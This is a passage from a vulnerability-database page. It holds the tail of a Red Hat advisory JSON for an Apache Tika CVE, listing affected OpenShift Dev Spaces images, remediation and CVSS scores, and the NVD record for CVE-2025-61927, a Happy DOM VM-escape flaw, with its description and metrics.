"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-66516"
},
{
"category": "external",
"summary": "RHBZ#2418870",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418870"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-66516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66516"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-66516",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66516"
},
{
"category": "external",
"summary": "https://cve.org/CVERecord?id=CVE-2025-54988",
"url": "https://cve.org/CVERecord?id=CVE-2025-54988"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k",
"url": "https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k"
}
],
"release_date": "2025-12-04T16:17:24.980000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-15T21:46:21+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23225"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Critical"
}
],
"title": "tika-core: tika-parsers: tika-parser-pdf-module: Apache Tika core, Apache Tika parsers, Apache Tika PDF parser module: Update to CVE-2025-54988 to expand scope of artifacts affected"
}
]
}
FKIE_CVE-2025-61927
Vulnerability from fkie_nvd - Published: 2025-10-10 20:15 - Updated: 2025-10-14 19:36
Severity ?
Summary
Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. Version 20.0.0 patches the issue by changing JavaScript evaluation to be disabled by default.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. Version 20.0.0 patches the issue by changing JavaScript evaluation to be disabled by default."
}
],
"id": "CVE-2025-61927",
"lastModified": "2025-10-14T19:36:59.730",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:L/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-10-10T20:15:38.430",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-94"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…